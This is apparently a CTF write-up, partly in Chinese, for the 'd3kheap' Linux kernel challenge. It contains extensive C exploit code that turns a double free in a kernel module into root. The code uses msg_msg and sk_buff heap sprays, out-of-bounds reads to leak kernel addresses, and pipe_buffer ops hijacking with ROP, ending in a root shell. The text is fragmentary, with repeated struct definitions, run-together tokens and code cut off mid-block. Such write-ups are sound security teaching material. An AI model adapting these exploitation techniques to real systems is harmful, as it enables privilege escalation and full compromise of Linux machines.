switch (cmd) { case OBJ_ADD: if (buf) { printk(KERN_ALERT "[d3kheap:] You already had a buffer!"); break; } buf = kmalloc(1024, GFP_KERNEL); ref_count++; printk(KERN_INFO "[d3kheap:] Alloc done.\n"); break; case OBJ_EDIT: printk(KERN_ALERT "[d3kheap:] Function not completed yet, because I\'m a pigeon!"); break; case OBJ_SHOW: printk(KERN_ALERT "[d3kheap:] Function not completed yet, because I\'m a pigeon!"); break; case OBJ_DEL: if (!buf) { printk(KERN_ALERT "[d3kheap:] You don\'t had a buffer!"); break; } if (!ref_count) { printk(KERN_ALERT "[d3kheap:] The buf already free!"); break; } ref_count--; kfree(buf); printk(KERN_INFO "[d3kheap:] Free done.\n"); break; default: printk(KERN_ALERT "[d3kheap:] Invalid instructions.\n"); break; }
现在我们有了「写的原语」,接下来我们要寻找「读的原语」,在 Linux kernel 中有着一组 system V 消息队列相关的系统调用:
msgget:创建一个消息队列
msgsnd:向指定消息队列发送消息
msgrcv:从指定消息队列接接收消息
当我们创建一个消息队列时,在内核空间中会创建这样一个结构体,其表示一个消息队列:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
/* one msq_queue structure for each present queue on the system */ structmsg_queue { structkern_ipc_permq_perm; time64_t q_stime; /* last msgsnd time */ time64_t q_rtime; /* last msgrcv time */ time64_t q_ctime; /* last change time */ unsignedlong q_cbytes; /* current number of bytes on queue */ unsignedlong q_qnum; /* number of messages in queue */ unsignedlong q_qbytes; /* max number of bytes on queue */ structpid *q_lspid;/* pid of last msgsnd */ structpid *q_lrpid;/* last receive pid */
/* one msg_msg structure for each message */ structmsg_msg { structlist_headm_list; long m_type; size_t m_ts; /* message text size */ structmsg_msgseg *next; void *security; /* the actual message follows immediately */ };
if (msgflg & MSG_COPY) { if ((msgflg & MSG_EXCEPT) || !(msgflg & IPC_NOWAIT)) return -EINVAL; copy = prepare_copy(buf, min_t(size_t, bufsz, ns->msg_ctlmax)); if (IS_ERR(copy)) return PTR_ERR(copy); }
//...
/* * If we are copying, then do not unlink message and do * not update queue parameters. */ if (msgflg & MSG_COPY) { msg = copy_msg(msg, copy); goto out_unlock0; }
//...
接下来我们考虑越界读取的详细过程,我们首先可以利用 setxattr 修改 msg_msg 的 next 指针为 NULL、将其 m_ts 改为 0x1000 - 0x30(在 next 指针为 NULL 的情况下,一个 msg_msg 结构体最大占用一张内存页的大小),从而越界读出内核堆上数据
接下来我们思考如何进行“合法”的搜索,我们先来看 copy_msg 的逻辑,其拷贝时判断待数据长度的逻辑主要是看 next 指针,因此若我们的 next 指针为一个非法地址,则会在解引用时导致 kernel panic
/** * struct pipe_buffer - a linux kernel pipe buffer * @page: the page containing the data for the pipe buffer * @offset: offset of data inside the @page * @len: length of data inside the @page * @ops: operations associated with this buffer. See @pipe_buf_operations. * @flags: pipe buffer flags. See above. * @private: private data owned by the ops. **/ structpipe_buffer { structpage *page; unsignedint offset, len; conststructpipe_buf_operations *ops; unsignedint flags; unsignedlong private; };
ret = msgrcv(ms_qid[0], buf, 0x2000 - 0x30, 0, IPC_NOWAIT | MSG_NOERROR | MSG_COPY); if (ret < 0) { puts("[x] msgrcv!"); exit(-1); } kmsg_addr = buf[(0x1000 - 0x30) / 8 + 1]; /*puts("[*] leaking..."); for (int i = (0x1000 - 0x30) / 8; i < (0x2000 - 0x30) / 8 ; i++) printf("[----data dump----] %d: %p\n", i, buf[i]);*/ fake_ops_addr = kmsg_addr - fake_ops_offset; printf("[+] UAF as fake ops addr at: %p, cal by msg idx: %d at addr: %p\n", fake_ops_addr, kmsg_idx, kmsg_addr);
// leak kernel text base if we didn't leak it before kernel_heap_search = kmsg_addr - 8; for (int leaking_times = 0; !kernel_text_leak; leaking_times++) { printf("[*] per leaking, no.%d time(s)\n", leaking_times);
msg_offset_count = 0; msg_offset = 0xdeadbeefbad4f00d; for (int i = (0x1000 - 0x30) / 8; i < (0x2000 - 0x30) / 8; i++) { printf("[----data dump----][%d] %p\n", i, buf[i]); if ((buf[i] > 0xffffffff81000000) && (buf[i] < 0xffffffffbfffffff) && !kernel_text_leak) { printf("[*] We got text leak! ktext: %p\n", buf[i]); kernel_offset = kernelLeakQuery(buf[i]); if (kernel_offset != 0xdeadbeef) { kernel_text_leak = buf[i]; kernel_base += kernel_offset; break; } } if (!buf[i]) msg_offset = msg_offset_count * 8; msg_offset_count++; }
if (kernel_text_leak) break;
if (msg_offset == 0xdeadbeefbad4f00d) { puts("[x] Failed to find next valid foothold!"); exit(EXIT_FAILURE); } kernel_heap_search += msg_offset; // to make the msg_msg->next == NULL, search from the last NULL }
// comfortably double free like A->B->A, its checking is as simple as the fastbin in ptmalloc2 ((struct msg_msg*) buf)->m_list.next = kernel_heap_search; // a pointer to the heap is available, list_del (aka unlink) is easy to pass ((struct msg_msg*) buf)->m_list.prev = kernel_heap_search; ((struct msg_msg*) buf)->m_type = NULL; ((struct msg_msg*) buf)->m_ts = 1024 - 0x30; ((struct msg_msg*) buf)->next = NULL; ((struct msg_msg*) buf)->security = NULL;
// while the kmem_cache->offset is not 0, we can easily repair the header of msg_msg setxattr("/tmp/exp", "arttnba3", buf, 0x2e0, 0);
ret = msgrcv(ms_qid[kmsg_idx], buf, 1024 - 0x30, 0, IPC_NOWAIT | MSG_NOERROR); // add a obj to pass detection in set_freepointer() in free_msg if (ret < 0) { puts("[x] msgrcv!"); return-1; }
/* one msg_msg structure for each message */ structmsg_msg { structlist_headm_list; long m_type; size_t m_ts; /* message text size */ structmsg_msgseg *next; void *security; /* the actual message follows immediately */ };
/** * struct pipe_buffer - a linux kernel pipe buffer * @page: the page containing the data for the pipe buffer * @offset: offset of data inside the @page * @len: length of data inside the @page * @ops: operations associated with this buffer. See @pipe_buf_operations. * @flags: pipe buffer flags. See above. * @private: private data owned by the ops. **/ structpipe_buffer { structpage *page; unsignedint offset, len; conststructpipe_buf_operations *ops; unsignedint flags; unsignedlong private; };
long dev_fd; int pipe_fd[2], pipe_fd2[2], pipe_fd_1;
/* * skb_shared_info need to take 320 bytes at the tail * so the max size of buf we should send is: * 1024 - 320 = 704 */ char fake_secondary_msg[704];
voidadd(void) { ioctl(dev_fd, OBJ_ADD); }
voiddel(void) { ioctl(dev_fd, OBJ_DEL); }
size_t user_cs, user_ss, user_sp, user_rflags;
voidsaveStatus() { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); printf("\033[34m\033[1m[*] Status has been saved.\033[0m\n"); }
intspraySkBuff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size) { for (int i = 0; i < SOCKET_NUM; i++) for (int j = 0; j < SK_BUFF_NUM; j++) { // printf("[-] now %d, num %d\n", i, j); if (write(sk_socket[i][0], buf, size) < 0) return-1; } return0; }
intfreeSkBuff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size) { for (int i = 0; i < SOCKET_NUM; i++) for (int j = 0; j < SK_BUFF_NUM; j++) if (read(sk_socket[i][1], buf, size) < 0) return-1; return0; }
voidgetRootShell(void) { if (getuid()) errExit("failed to gain the root!");
printf("\033[32m\033[1m[+] Succesfully gain the root privilege, trigerring root shell now...\033[0m\n"); system("/bin/sh"); }
intmain(int argc, char **argv, char **envp) { int oob_pipe_fd[2]; int sk_sockets[SOCKET_NUM][2]; int pipe_fd[PIPE_NUM][2]; int msqid[MSG_QUEUE_NUM]; int victim_qid, real_qid; structmsg_msg *nearby_msg; structmsg_msg *nearby_msg_prim; structpipe_buffer *pipe_buf_ptr; structpipe_buf_operations *ops_ptr; uint64_t victim_addr; uint64_t kernel_base; uint64_t kernel_offset; uint64_t *rop_chain; int rop_idx; cpu_set_t cpu_set;
saveStatus();
/* * Step.O * Initialization */
// run the exp on specific core only CPU_ZERO(&cpu_set); CPU_SET(0, &cpu_set); sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
// socket pairs to spray sk_buff for (int i = 0; i < SOCKET_NUM; i++) if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_sockets[i]) < 0) errExit("failed to create socket pair!");
dev_fd = open("/dev/d3kheap", O_RDONLY);
/* * Step.I * build msg_queue, spray primary and secondary msg_msg, * and use OOB write to construct the overlapping */ puts("\n\033[34m\033[1m[*] Step.I spray msg_msg, construct overlapping object\033[0m");
puts("[*] Build message queue..."); // build 4096 message queue for (int i = 0; i < MSG_QUEUE_NUM; i++) { if ((msqid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) < 0) errExit("failed to create msg_queue!"); }
puts("[*] Spray primary and secondary msg_msg...");
// free the victim secondary msg_msg, then we get a UAF puts("[*] Trigger UAF..."); del();
// spray sk_buff to mark the UAF msg_msg puts("[*] spray sk_buff..."); buildMsg((struct msg_msg *)fake_secondary_msg, *(uint64_t*)"arttnba3", *(uint64_t*)"arttnba3", *(uint64_t*)"arttnba3", SECONDARY_MSG_SIZE, 0, 0); if (spraySkBuff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0) errExit("failed to spray sk_buff!");
// find out the UAF queue victim_qid = -1; for (int i = 0; i < MSG_QUEUE_NUM; i++) { /* * the msg_msg got changed, so we can't read out * but it tells us which one the victim is */ if (peekMsg(msqid[i], &secondary_msg, sizeof(secondary_msg), 1) < 0) { printf("[+] victim qid: %d\n", i); victim_qid = i; } }
if (victim_qid == -1) errExit("failed to make the UAF in msg queue!");
if (freeSkBuff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0) errExit("failed to release sk_buff!");
puts("\033[32m\033[1m[+] UAF construction complete!\033[0m");
/* * Step.III * spray sk_buff to leak msg_msg addr * construct fake msg_msg to leak addr of UAF obj */ puts("\n\033[34m\033[1m[*] Step.III spray sk_buff to leak kheap addr\033[0m");
// use fake msg_msg to read OOB puts("[*] OOB read from victim msg_msg"); if (peekMsg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0) errExit("failed to read victim msg!");
if (*(int *)&oob_msg.mtext[SECONDARY_MSG_SIZE] != MSG_TAG) errExit("failed to rehit the UAF object!");
printf("\033[32m\033[1m[+] addr of primary msg of msg nearby victim: \033[0m%llx\n", nearby_msg->m_list.prev);
// release and re-spray sk_buff to construct fake msg_msg // so that we can make an arbitrary read on a primary msg_msg if (freeSkBuff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0) errExit("failed to release sk_buff!");
puts("[*] arbitrary read on primary msg of msg nearby victim"); if (peekMsg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0) errExit("failed to read victim msg!");
if (*(int *)&oob_msg.mtext[0x1000] != MSG_TAG) errExit("failed to rehit the UAF object!");
// cal the addr of UAF obj by the header we just read out nearby_msg_prim = (struct msg_msg*) &oob_msg.mtext[0x1000 - sizeof(struct msg_msg)]; victim_addr = nearby_msg_prim->m_list.next - 0x400;
printf("\033[32m\033[1m[+] addr of msg next to victim: \033[0m%llx\n", nearby_msg_prim->m_list.next); printf("\033[32m\033[1m[+] addr of msg UAF object: \033[0m%llx\n", victim_addr);
/* * Step.IV * fix the header of UAF obj and release it * spray pipe_buffer and leak the kernel base */ puts("\n\033[34m\033[1m[*] Step.IV spray pipe_buffer to leak kernel base\033[0m");
// re-construct the msg_msg to fix it puts("[*] fixing the UAF obj as a msg_msg..."); if (freeSkBuff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0) errExit("failed to release sk_buff!");
memset(fake_secondary_msg, 0, sizeof(fake_secondary_msg)); buildMsg((struct msg_msg *)fake_secondary_msg, victim_addr + 0x800, victim_addr + 0x800, // a valid kheap addr is valid VICTIM_MSG_TYPE, SECONDARY_MSG_SIZE - sizeof(struct msg_msg), 0, 0); if (spraySkBuff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0) errExit("failed to spray sk_buff!");
// release UAF obj as secondary msg puts("[*] release UAF obj in message queue..."); if (readMsg(msqid[victim_qid], &secondary_msg, sizeof(secondary_msg), VICTIM_MSG_TYPE) < 0) errExit("failed to receive secondary msg!");
// spray pipe_buffer puts("[*] spray pipe_buffer..."); for (int i = 0; i < PIPE_NUM; i++) { if (pipe(pipe_fd[i]) < 0) errExit("failed to create pipe!");
// write something to activate it if (write(pipe_fd[i][1], "arttnba3", 8) < 0) errExit("failed to write the pipe!"); }
// release the sk_buff to read pipe_buffer, leak kernel base puts("[*] release sk_buff to read pipe_buffer..."); pipe_buf_ptr = (struct pipe_buffer *) &fake_secondary_msg; for (int i = 0; i < SOCKET_NUM; i++) { for (int j = 0; j < SK_BUFF_NUM; j++) { if (read(sk_sockets[i][1], &fake_secondary_msg, sizeof(fake_secondary_msg)) < 0) errExit("failed to release sk_buff!");
/* * Step.V * hijack the ops of pipe_buffer * free all pipe to trigger fake ptr * so that we hijack the RIP * construct a ROP on pipe_buffer */ puts("\n\033[34m\033[1m[*] Step.V hijack the ops of pipe_buffer, gain root privilege\033[0m");
puts("[*] pre-construct data in userspace..."); pipe_buf_ptr = (struct pipe_buffer *) fake_secondary_msg; pipe_buf_ptr->page = *(uint64_t*) "arttnba3"; pipe_buf_ptr->ops = victim_addr + 0x100;
This is a standard kernel pwn challenge. We are given an unprivileged shell in a Linux VM, and the flag can only be read by root. The VM loads a vulnerable kernel module, which we have to exploit to gain root privileges and read the flag.